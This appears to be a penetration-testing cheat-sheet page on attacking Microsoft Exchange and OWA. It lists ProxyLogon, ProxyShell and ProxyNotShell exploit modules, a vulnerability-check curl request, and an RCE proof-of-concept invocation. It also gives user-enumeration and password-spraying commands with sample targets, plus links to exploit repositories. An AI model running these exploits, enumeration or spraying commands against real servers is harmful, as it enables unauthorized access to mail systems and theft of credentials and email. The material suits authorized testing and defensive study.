Exchange / OWA

Checklists/Microsoft Exchange.md at master · netbiosX/ChecklistsGitHub

GitHub - kh4sh3i/exchange-penetration-testing: The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)GitHub

https://ppn.snovvcrash.rocks/pentest/perimeter/exchangeppn.snovvcrash.rocks

https://ppn.snovvcrash.rocks/pentest/perimeter/owappn.snovvcrash.rocks

54  auxiliary/gather/exchange_proxylogon_collector                2021-03-02       normal     No     Microsoft Exchange ProxyLogon Collector
   55    \_ action: Dump (Contacts)                                  .                .          .      Dump user contacts from exchange server
   56    \_ action: Dump (Emails)                                    .                .          .      Dump user emails from exchange server
   57  exploit/windows/http/exchange_proxylogon_rce                  2021-03-02       excellent  Yes    Microsoft Exchange ProxyLogon RCE
   58    \_ target: Windows Powershell                               .                .          .      .
   59    \_ target: Windows Dropper                                  .                .          .      .
   60    \_ target: Windows Command                                  .                .          .      .
   61  auxiliary/scanner/http/exchange_proxylogon                    2021-03-02       normal     No     Microsoft Exchange ProxyLogon Scanner
   62  exploit/windows/http/exchange_proxynotshell_rce               2022-09-28       excellent  Yes    Microsoft Exchange ProxyNotShell RCE
   63    \_ target: Windows Dropper                                  .                .          .      .
   64    \_ target: Windows Command                                  .                .          .      .
   65  exploit/windows/http/exchange_proxyshell_rce                  2021-04-06       excellent  Yes    Microsoft Exchange ProxyShell RCE
   66    \_ target: Windows Powershell                               .                .          .      .
   67    \_ target: Windows Dropper                                  .                .          .      .
   68    \_ target: Windows Command                                  .                .          .      .

Version, NTLM auth realm

Small helper to check Exchange Version, Release date and NTLM auth realm

Pentest-Tools-Collection/tools/ActiveDirectory/Exchange-Checker.ps1 at main · LuemmelSec/Pentest-Tools-CollectionGitHub

GitHub - pwnfoo/NTLMRecon: Enumerate information from NTLM authentication enabled web endpoints 🔎GitHub

git clone https://github.com/pwnfoo/NTLMRecon.git
cd NTLMRecon
python3 -m venv venv
source venv/bin/activate
python3 setup.py install
ntlmrecon --input https://[IP]

Internal Pentest - NTLM Reco

GitHub - nyxgeek/ntlmscan: scan for NTLM directoriesGitHub

Proxy Logon

A New Attack Surface on MS Exchange Part 1 - ProxyLogon!Orange Tsai

Exchange Server 2019 < 15.02.0792.010
Exchange Server 2019 < 15.02.0721.013
Exchange Server 2016 < 15.01.2106.013
Exchange Server 2013 < 15.00.1497.012

> use auxiliary/scanner/http/exchange_proxylogon
msf6 auxiliary(scanner/http/exchange_proxylogon) > set rhosts 10.4.10.21
msf6 auxiliary(scanner/http/exchange_proxylogon) > run
[-] https://10.4.10.21:443 - The target is not vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

ProxyShell - CVE-2021-34473

Check if exchange is vulnerable:

curl -k -i 'https://10.4.10.21/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'

GitHub - dmaasland/proxyshell-pocGitHub

proxyshell_rce.py -u https://'<exchange>' -e administrator@'<domain>'

CVE-2023-36745 - RCE

GitHub - N1k0la-T/CVE-2023-36745GitHub

ProxyNotShell

GitHub - MazX0p/ProxyNotShell-ScannerGitHub

OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell MitigationsCrowdStrike.com

Exploiting Exchange Powershell after ProxyNotShell

Zero Day Initiative — Exploiting Exchange PowerShell After ProxyNotShell: Part 1 - MultiValuedPropertyZero Day Initiative

User enumeration

Metasploit owa_login

MailSniper

GitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.GitHub

Msmailprobe

GitHub - busterb/msmailprobe: Office 365 and Exchange EnumerationGitHub

git clone https://github.com/busterb/msmailprobe.git
cd msmailprobe
go build
./msmailprobe userenum --onprem -t [IP] -U users.txt -o validusers.txt

Password Spray

GitHub - blacklanternsecurity/TREVORspray: TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!GitHub

trevorspray -u valid_users.txt -p cersei --url https://10.4.10.21/autodiscover/autodiscover.xml -m owa

Bruteforce

Cloud

Microsoft Exchange ActiveSync (EAS)

/Microsoft-Server-ActiveSync/is reachable

GitHub - 0xB455/ActiveSyncBruterGitHub

Resources

Exchange - Part 1 - no credsMayfly

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.